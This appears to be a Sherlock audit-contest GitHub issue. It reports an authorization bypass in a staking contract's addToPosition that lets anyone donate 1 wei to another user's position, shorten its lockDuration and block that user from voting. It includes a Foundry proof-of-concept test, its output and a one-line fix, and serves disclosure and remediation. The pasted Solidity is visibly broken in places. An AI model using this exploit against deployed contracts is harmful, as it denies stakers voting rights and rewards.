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Yashar - Attacker can manipulate the lockDuration of other users positions #378

sherlock-admin4 opened this issue Jul 15, 2024 · 4 comments
Has Duplicates A valid issue with 1+ other issues describing the same vulnerability Medium A Medium severity issue. Reward A payout will be made for this issue Sponsor Confirmed The sponsor acknowledged this issue is valid Will Fix The sponsor confirmed this issue will be fixed


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sherlock-admin4 commented Jul 15, 2024



Attacker can manipulate the lockDuration of other users positions


The _requireOnlyOperatorOrOwnerOf check in addToPosition can be bypassed, allowing attackers to manipulate the lockDuration of other users positions, impacting voting eligibility and preventing users from participating in voting and earning rewards.

Vulnerability Detail

The _requireOnlyOperatorOrOwnerOf check in addToPosition ensures that the caller is either the owner or the operator of the tokenId:

    function addToPosition(uint256 tokenId, uint256 amountToAdd) external override nonReentrant {

The _requireOnlyOperatorOrOwnerOf function performs this verification by calling ERC721Upgradeable._isAuthorized with msg.sender as both the owner and spender:

    function _requireOnlyOperatorOrOwnerOf(uint256 tokenId) internal view {
        // isApprovedOrOwner: caller has no rights on token
        require(ERC721Upgradeable._isAuthorized(msg.sender, msg.sender, tokenId), "FORBIDDEN");

Since _isAuthorized returns true when owner == spender, this check always evaluates to true regardless of the caller's identity:

    function _isAuthorized(address owner, address spender, uint256 tokenId) internal view virtual returns (bool) {
            spender != address(0) &&
            (owner == spender || isApprovedForAll(owner, spender) || _getApproved(tokenId) == spender);

Any function implementing this check is vulnerable to bypass, but currently only addToPosition is affected.
An attack scenario involves an attacker manipulating the lockDuration of another user's position by donating a small amount (1 wei).
When users create a position, lockDuration dictates how long their asset is locked. This duration impacts rewards, voting eligibility, etc. If an attacker increases another user's position via addToPosition, the function recalculates lockDuration based on new amountToAdd and existing lock times:

        // we calculate the avg lock time:
        // lock_duration = (remainin_lock_time * staked_amount + amount_to_add * inital_lock_duration) / (staked_amount + amount_to_add)
        uint256 remainingLockTime = _remainingLockTime(position);
        uint256 avgDuration = (remainingLockTime * position.amount + amountToAdd * position.initialLockDuration)
            / (position.amount + amountToAdd);
    function _remainingLockTime(StakingPosition memory position) internal view returns (uint256) {
        if ((position.startLockTime + position.lockDuration) <= _currentBlockTimestamp()) {
            return 0;
        return (position.startLockTime + position.lockDuration) - _currentBlockTimestamp();

A malicious user can call addToPosition and donate 1 wei to a position, thereby manipulating the lockDuration of that position, which will have multiple consequences for the victim.

  • Alice creates a position with 100e18 as amount and 2 weeks as lockDuration.
  • 1 week later the Admin starts a new voting period.
  • Given that Alice's position's lockDuration is equal to the PeriodDuration, which is 2 weeks, she is eligible to participate in voting.
  • Bob (a malicious actor) calls the addToPosition and donate 1 wei to Alice's position
  • Alice's lockDuration is recalculated, potentially reducing it to 1 week.
  • Alice calls the vote but her transaction reverts due to InsufficientLockTime error.

NOTE: There's no need to front-run Alice's transaction because whenever Bob performs this malicious addToPosition, the lockDuration of Alice's position will be manipulated. All that Bob needs to do is execute this action before Alice calls the vote, and it doesn't have to be immediately preceding Alice's transaction.

Coded PoC

Above scenario is implemented in this test
Please make a file named Ninja.t.sol in this path: /test/ and paste the following test code in it:

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.20;

import "forge-std/Test.sol";

import "../src/transparent/TransparentUpgradeableProxy2Step.sol";

import {ERC20Mock} from "./mocks/ERC20.sol";
import {MasterChefMock} from "./mocks/MasterChefMock.sol";
import {MlumStaking} from "../src/MlumStaking.sol";
import "../src/Voter.sol";
import {IVoter} from "../src/interfaces/IVoter.sol";
import "../src/interfaces/IBribeRewarder.sol";
import "../src/rewarders/BribeRewarder.sol";
import "../src/rewarders/RewarderFactory.sol";

contract Ninja is Test {
    address payable immutable DEV = payable(makeAddr("dev"));
    address payable immutable ALICE = payable(makeAddr("alice"));
    address payable immutable BOB = payable(makeAddr("bob"));

    address pool = makeAddr("pool");

    Voter private _voter;
    MlumStaking private _pool;

    ERC20Mock private _stakingToken;
    ERC20Mock private _rewardToken;
    ERC20Mock private _bribeRewardToken;

    BribeRewarder rewarder;
    RewarderFactory factory;

    function setUp() public {
        _bribeRewardToken = new ERC20Mock("Reward Token", "RT", 6);

        _stakingToken = new ERC20Mock("MagicLum", "MLUM", 18);

        _rewardToken = new ERC20Mock("USDT", "USDT", 6);

        address poolImpl = address(new MlumStaking(_stakingToken, _rewardToken));

        _pool = MlumStaking(
                new TransparentUpgradeableProxy2Step(
                    poolImpl, ProxyAdmin2Step(address(1)), abi.encodeWithSelector(MlumStaking.initialize.selector, DEV)

        MasterChefMock mock = new MasterChefMock();

        address factoryImpl = address(new RewarderFactory());
        factory = RewarderFactory(
                new TransparentUpgradeableProxy2Step(
                        RewarderFactory.initialize.selector, address(this), new uint8[](0), new address[](0)
        address voterImpl = address(new Voter(mock, _pool, IRewarderFactory(address(factory))));

        _voter = Voter(
                new TransparentUpgradeableProxy2Step(
                    voterImpl, ProxyAdmin2Step(address(1)), abi.encodeWithSelector(Voter.initialize.selector, DEV)

            IRewarderFactory.RewarderType.BribeRewarder, IRewarder(address(new BribeRewarder(address(_voter))))
        rewarder = BribeRewarder(payable(address(factory.createBribeRewarder(_bribeRewardToken, pool))));

        _voter.updateMinimumLockTime(2 weeks);

    function test_MaliciousAddToPosition() public {
        IMlumStaking.StakingPosition memory position;

        _createPosition(ALICE, 100 ether, 2 weeks);
        assertEq(_pool.ownerOf(1), ALICE);, 1 wei);

        position = _pool.getStakingPosition(1);
        assertEq(position.lockDuration, 2 weeks);
        assertEq(_remainingLockTime(position), 2 weeks);

        console.log("%s%s", "lockDuration Before Malicious addToPosition: ", position.lockDuration);

        skip(1 weeks);
        // 1 week later the Admin starts a voting period
        assertEq(1, _voter.getCurrentVotingPeriod());

        // Alice is eligible to Vote because her position's lockDuration is = to the duration of the period
        // 2 weeks == 2 weeks
        assertEq(position.lockDuration, _voter.getPeriodDuration());

        // Bob maliciously adds 1 wei to Alice's position which will update her position and decreases her lockDuration
        _stakingToken.approve(address(_pool), 1 wei);
        _pool.addToPosition(1, 1 wei);

        // Alice will lose her eligibility due to the lockDuration decrease that occurred after Bob maliciously added 1 wei to her position.
        // Now Alice's lockDuration is 1 week, which is less than the PeriodDuration which 2 weeks.
        position = _pool.getStakingPosition(1);
        assertLt(position.lockDuration, _voter.getPeriodDuration());
        assertEq(position.lockDuration, 1 weeks);
        console.log("%s%s", "lockDuration After Malicious addToPosition:  ", position.lockDuration);

        // Alice calls the vote function but her tx reverts due to the InsufficientLockTime error
        );, _getDummyPools(), _getDeltaAmounts());

    ||||||||||||||||||||||||| INTERNAL FUNCTIONS |||||||||||||||||||||||||||||

    function _createPosition(address user, uint256 amount, uint256 duration) internal {, 100 ether);

        _stakingToken.approve(address(_pool), amount);
        _pool.createPosition(amount, duration);

    function _getDeltaAmounts() internal pure returns (uint256[] memory deltaAmounts) {
        deltaAmounts = new uint256[](1);
        deltaAmounts[0] = 1e18;

    function _getDummyPools() internal view returns (address[] memory pools) {
        pools = new address[](1);
        pools[0] = pool;

    function _remainingLockTime(IMlumStaking.StakingPosition memory position) internal view returns (uint256) {
        if ((position.startLockTime + position.lockDuration) <= _currentBlockTimestamp()) {
            return 0;
        return (position.startLockTime + position.lockDuration) - _currentBlockTimestamp();

    function _currentBlockTimestamp() internal view virtual returns (uint256) {
        return block.timestamp;

Run the test:

forge test --mt test_MaliciousAddToPosition -vv


Compiler run successful!

Ran 1 test for test/Ninja.t.sol:Ninja
[PASS] test_MaliciousAddToPosition() (gas: 624706)
  lockDuration Before Malicious addToPosition: 1209600
  lockDuration After Malicious addToPosition:  604800

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.64ms (340.63µs CPU time)


This bug has multiple impacts on rewards calculation, voting eligibility, etc., as highlighted in this report, particularly preventing users from participating in voting, thereby denying them access to rewards.

Code Snippet

Tool used

Manual Review


    function _requireOnlyOperatorOrOwnerOf(uint256 tokenId) internal view {
        // isApprovedOrOwner: caller has no rights on token
-       require(ERC721Upgradeable._isAuthorized(msg.sender, msg.sender, tokenId), "FORBIDDEN");
+       require(ERC721Upgradeable._isAuthorized(ownerOf(tokenId), msg.sender, tokenId), "FORBIDDEN");
@github-actions github-actions bot added Medium A Medium severity issue. Has Duplicates A valid issue with 1+ other issues describing the same vulnerability labels Jul 21, 2024
This was referenced Jul 21, 2024
This was referenced Jul 21, 2024
@sherlock-admin3 sherlock-admin3 added Sponsor Confirmed The sponsor acknowledged this issue is valid Will Fix The sponsor confirmed this issue will be fixed labels Jul 22, 2024
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Users Can Add Amounts Instead of Each Other:
We see that the _requireOnlyOperatorOrOwnerOf function always returns true using the msg.sender and msg.sender arguments, and therefore any user can add amounts to other users' staking positions.

This can lead to harm to the positions of others and lead to involuntary changes.

To solve this problem, the _requireOnlyOperatorOrOwnerOf function must be updated and it must be properly checked whether the caller is authorized or not.

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0xHans1 commented Jul 25, 2024


We fixed this issue already for an other audit. Basically we removed all isApprover... / requireOnlyOperator... checks and check for ownership instead. The linked PR just highlight the _checkOwnerOf function.

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The protocol team fixed this issue in the following PRs/commits:

@sherlock-admin4 sherlock-admin4 changed the title Muscular Pearl Sparrow - Attacker can manipulate the lockDuration of other users positions Yashar - Attacker can manipulate the lockDuration of other users positions Jul 29, 2024
@sherlock-admin4 sherlock-admin4 added the Reward A payout will be made for this issue label Jul 29, 2024
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The Lead Senior Watson signed off on the fix.

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Has Duplicates A valid issue with 1+ other issues describing the same vulnerability Medium A Medium severity issue. Reward A payout will be made for this issue Sponsor Confirmed The sponsor acknowledged this issue is valid Will Fix The sponsor confirmed this issue will be fixed
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5 participants